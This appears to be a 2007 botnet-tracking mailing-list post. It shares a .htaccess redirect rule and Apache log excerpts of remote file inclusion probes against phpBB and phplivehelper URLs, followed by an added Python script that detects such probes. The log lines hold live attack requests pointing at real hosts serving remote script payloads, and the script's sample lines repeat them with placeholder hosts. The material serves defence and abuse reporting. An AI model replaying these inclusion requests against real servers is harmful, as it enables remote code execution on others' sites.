To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

Hi all;

I don't know if this will help anyone track these; I can't really make too much sense of the log.

I implemented a .htaccess rule to 301 redirect libwww-perl etc. to google.com:

    RewriteCond %{HTTP_USER_AGENT} ^libwww-perl.*$ [NC]
    RewriteRule \.*$ http://www.google.com [R,L]

and so they came...

Here are some examples from the current access.log file:

    megan.netlogistics.com.au - - [08/Sep/2007:07:27:52 +1000] "GET /index.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"

(This is the only one I contacted, and they sent back an email from [EMAIL PROTECTED], contents of which is...

    Hi,

    We will investigate this issue. In the mean time can you please provide us your IP address so we can block all traffic to your address so that you are not affected by this.

    Regards,
    Tarinder Singh,
    Systems Administrator
    Net Logistics Pty. Ltd.
    http://www.netlogistics.com.au
)

    193.138.206.192 - - [08/Sep/2007:07:30:20 +1000] "GET /faq.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
    ...
    b2.d7.344a.static.theplanet.com - - [10/Sep/2007:18:16:11 +1000] "GET //phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
    dime54.dizinc.com - - [10/Sep/2007:18:17:06 +1000] "GET //phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
    ik80.ikexpress.com - - [10/Sep/2007:18:18:17 +1000] "GET //phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
    mistral.lublin.pl - - [10/Sep/2007:18:33:15 +1000] "GET //phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.803"
    ...
    p1w33.geo.scd.hostingprod.com - - [10/Sep/2007:20:08:57 +1000] "GET /initiate.php?abs_path=http://ofskroz.somee.com/1337/perls/id.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.803"
    p1w33.geo.scd.hostingprod.com - - [10/Sep/2007:20:36:15 +1000] "GET /m32forum/%3Cwbr%20/%3Eshowtopic.php?threadid=62&time=/initiate.php?abs_path=http://ofskroz.somee.com/1337/perls/id.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.803"
    ...
    vps.websitedepot.com - - [20/Sep/2007:06:51:05 +1000] "GET /playlist.php?phpbb_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
    ...
    megan.netlogistics.com.au - - [20/Sep/2007:07:09:49 +1000] "GET /faq.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
    business-media.info - - [20/Sep/2007:07:14:32 +1000] "GET /faq.php?phpbb_root_path=http://sapikeren.net/yogya-carder/indonesia/Themes/nebula/temp? HTTP/1.1" 301 208 "-" "libwww-perl/5.69"
    pass22.dizinc.com - - [20/Sep/2007:07:23:49 +1000] "GET /playlist.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
    ns7.xenserve.com - - [20/Sep/2007:07:30:18 +1000] "GET /faq.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
    srv24.icx.pl - - [20/Sep/2007:07:41:28 +1000] "GET /playlist.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
    hostman.pl - - [20/Sep/2007:07:50:10 +1000] "GET /index.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
    srv24.icx.pl - - [20/Sep/2007:08:03:39 +1000] "GET /index.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
    202.60.80.10 - - [20/Sep/2007:08:19:27 +1000] "GET /song.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
    r118126.ppp.asahi-net.or.jp - - [20/Sep/2007:08:28:05 +1000] "GET /faq.php?phpbb_root_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 301 208 "-" "libwww-perl/5.79"
    ...
    r118126.ppp.asahi-net.or.jp - - [20/Sep/2007:08:46:10 +1000] "GET /song.php?phpbb_root_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 301 208 "-" "libwww-perl/5.79"
    hostman.pl - - [20/Sep/2007:08:48:32 +1000] "GET /faq.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
    69.57.190.194 - - [20/Sep/2007:09:01:52 +1000] "GET /index.php?phpbb_root_path=http://coyoteco.iespana.es/cmd.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.79"
    srv24.icx.pl - - [20/Sep/2007:09:12:33 +1000] "GET /song.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"

-----------------------------------------------
Dave Arrowsmith
http://www.4tfingers.biz/
PO Box 111, Bogangar, NSW, 2488, Australia.
Friends may come and go, but enemies accumulate.
_______________________________________________
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
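
Added example, not part of the original post: one way to pull requests like the ones in this log out of an Apache combined-format access.log and group them by source host and by the host the payload is fetched from, which is what an abuse report needs. The sample lines, hosts and the function names find_rfi_probes and summarize are constructed for illustration; only the parameter names come from the log above.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$')
# A parameter whose value is a remote URL, matched anywhere in the query string so
# that a probe nested inside another parameter's value is still caught.
RFI_RE = re.compile(
    r'(?P<param>[\w\[\]]+)=(?P<url>(?:https?|ftp)://(?P<host>[^/?&\s]+)[^&\s]*)', re.I)

# Constructed sample lines (documentation hosts and addresses, not real traffic).
SAMPLE_LOG = [
    'scanner1.example.net - - [08/Sep/2007:07:27:52 +1000] "GET /index.php?phpbb_root_path='
    'http://payload.example.org/error.txt?? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"',
    '192.0.2.10 - - [10/Sep/2007:18:16:11 +1000] "GET //phplivehelper/initiate.php?abs_path='
    'http://payload.example.org/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [10/Sep/2007:20:36:15 +1000] "GET /forum/showtopic.php?threadid=62&time='
    '/initiate.php?abs_path=http://other.example.com/id.txt? HTTP/1.1" 301 208 "-" '
    '"libwww-perl/5.803"',
    '198.51.100.7 - - [10/Sep/2007:20:40:00 +1000] "GET /faq.php?page=2 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
]

def find_rfi_probes(lines):
    """Return one record per remote-URL parameter seen in the request targets."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip it
        _, _, query = m['target'].partition('?')
        for p in RFI_RE.finditer(unquote(query)):  # unquote catches %3A%2F%2F forms
            hits.append({'src': m['src'], 'time': m['ts'], 'status': int(m['status']),
                         'agent': m['agent'], 'param': p['param'],
                         'payload_host': p['host'].lower(), 'payload_url': p['url']})
    return hits

def summarize(hits):
    """Group probes by parameter, by payload host and by requesting source."""
    return {'by_param': Counter(h['param'] for h in hits),
            'by_payload_host': Counter(h['payload_host'] for h in hits),
            'by_source': Counter(h['src'] for h in hits)}

if __name__ == '__main__':
    for key, counts in summarize(find_rfi_probes(SAMPLE_LOG)).items():
        print(key, dict(counts))
```

Matching on the request rather than on the User-Agent means the same probes are still found if the client string changes; applications that legitimately accept a URL in a parameter will also match and need an allow-list.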